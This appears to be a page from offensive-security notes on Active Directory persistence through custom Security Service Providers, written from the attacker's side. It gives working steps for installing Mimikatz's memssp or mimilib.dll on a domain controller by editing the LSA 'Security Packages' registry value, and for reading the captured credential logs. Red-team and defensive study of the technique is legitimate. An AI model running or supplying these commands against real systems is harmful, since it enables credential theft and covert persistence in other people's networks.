Custom Security Service Providers (SSP's)

A Security Service Provider is an API which allows for authenticated connections.

Standard SSP's include:

NTLM
Kerberos
Negotiate
Secure Channel (Schannel)
Digest
Credential (CredSSP)

Upon startup, the computer loads the SSP DLL's. This allows attackers to drop their own custom DLL's which will load upon the next machine startup. This may allow us to capture credentials to use to further persist in the network.

Mimikatz provides its own custom DLL (mimilib.dll) which we can use as an example.

Injecting the Custom DLL

Requires Domain Admin privileges and must be performed on the DC.

Method 1 - Using Mimikatz

Note: this does not work very well on Server 2016

Invoke-Mimikatz -Command '"misc::memssp"'

Method 2 - Drop mimilib.dll into system32 and add mimilib to the security packages

# Step 1 - Add mimilib.dll to C:\Windows\system32

# Step 2
$packages = Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages'| select -ExpandProperty 'Security Packages'

$packages += "mimilib"

Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' -Value $packages

Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\" -Name
'Security Packages' -Value $packages

# Then check HKEY_Local_Machine\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig in regedit to confirm the addition

Check the log files for creds

# either mimilsa.log or kiwissp.log depending on the attack
# I believe it's mimilsa.log if you use Mimikatz, kiwissp.log if you manually drop the DLL
type c:\windows\system32\mimilsa.log

PreviousAdminSDHolder NextDirectory Services Restore Mode (DSRM)

Last updated 3 years ago